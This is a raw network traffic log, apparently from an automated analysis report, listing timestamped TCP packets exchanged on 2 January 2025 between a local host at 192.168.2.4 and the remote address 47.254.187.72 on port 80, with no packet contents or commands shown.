                                                                            Jan 2, 2025 20:34:50.993511915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993522882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993532896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993544102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993552923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993557930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993567944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993581057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993582964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993599892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993628025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993671894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993688107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993699074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993710041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993710995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993721008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993738890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993746042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993762016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993766069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993773937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993783951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993783951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993798018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993818045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993820906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993844986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993868113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993904114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993943930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.004004955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.004015923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.004038095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.004049063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.004061937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.004067898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.004079103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.004091978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.004093885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.004101992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.004112005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.004142046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.006351948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.006370068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.006381035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.006392002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.006403923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.006402969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.006421089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.006424904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.006433964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.006453991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.006478071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.007359028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.007371902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.007415056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.007438898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.007456064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.007467031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.007477045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.007477999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.007491112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.007500887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.007507086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.007513046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.007543087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.007563114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.010325909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.010380030 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.010411978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.010423899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.010436058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.010447025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.010453939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.010457993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.010468960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.010477066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.010479927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.010509968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.010524988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.013987064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.014005899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.014018059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.014029026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.014034033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.014040947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.014053106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.014060020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.014065027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.014091015 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.014108896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.014964104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.014974117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.014991999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.015002966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.015012980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.015018940 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.015023947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.015034914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.015044928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.015048027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.015057087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.015069008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.015081882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.015103102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.017761946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.017776012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.017786980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.017796993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.017808914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.017818928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.017821074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.017832041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.017844915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.017844915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.017877102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.017889977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.019921064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.019932985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.019942999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.019965887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.019973040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.019984007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.019994974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.019995928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.020006895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.020015955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.020036936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.020050049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.072525024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.072539091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.072549105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.072561026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.072571039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.072583914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.072596073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.072639942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.072654963 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.072695017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.074480057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.074520111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.074531078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.074542999 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.074548960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.074562073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.074573040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.074584007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.074589968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.074621916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.074628115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.074667931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.076203108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076253891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076266050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076267958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.076282978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076298952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.076304913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076314926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076327085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076332092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.076335907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076347113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076361895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.076390028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.076666117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076680899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076690912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076728106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.076728106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076738119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.076745987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076756954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076767921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076769114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.076777935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.076790094 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.076814890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.079145908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.079200029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.079242945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.079252958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.079266071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.079277992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.079284906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.079288006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.079299927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.079310894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.079327106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.079348087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.079376936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080142021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080185890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080189943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080195904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080233097 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080246925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080251932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080257893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080269098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080284119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080302000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080302000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080312967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080323935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080343962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080362082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080446959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080456972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080466986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080478907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080490112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080493927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080501080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080512047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080526114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080540895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080566883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080568075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080585003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080595970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080605984 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080606937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080617905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080620050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080640078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080641985 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080651045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080662966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.080666065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.080703974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.090783119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.090794086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.090805054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.090816975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.090826988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.090827942 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.090845108 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.090864897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.090904951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.090915918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.090926886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.090935946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.090941906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.090956926 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.090977907 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.093182087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.093193054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.093209982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.093220949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.093231916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.093242884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.093242884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.093242884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.093255043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.093265057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.093282938 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.093303919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.093338966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.094182968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.094194889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.094204903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.094223022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.094233036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.094238043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.094244957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.094254971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.094255924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.094266891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.094275951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.094276905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.094316959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.094336033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.097135067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.097151041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.097161055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.097172976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.097177029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.097193003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.097197056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.097206116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.097215891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.097218037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.097225904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.097239017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.097259998 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.100905895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.100918055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.100928068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.100939035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.100946903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.100950003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.100960016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.100971937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.100976944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.100991011 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.101010084 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.101030111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.101625919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.101644039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.101653099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.101670027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.101670027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.101680994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.101691961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.101721048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.101738930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.101749897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.101762056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.101771116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.101783991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.101819038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.104564905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.104584932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.104593992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.104604006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.104614973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.104624033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.104626894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.104639053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.104648113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.104655981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.104659081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.104695082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.104717016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.106877089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.106889009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.106899023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.106909037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.106920004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.106930971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.106936932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.106941938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.106967926 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.106988907 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.159131050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.159145117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.159163952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.159173965 CET804973047.254.187.72192.168.2.4
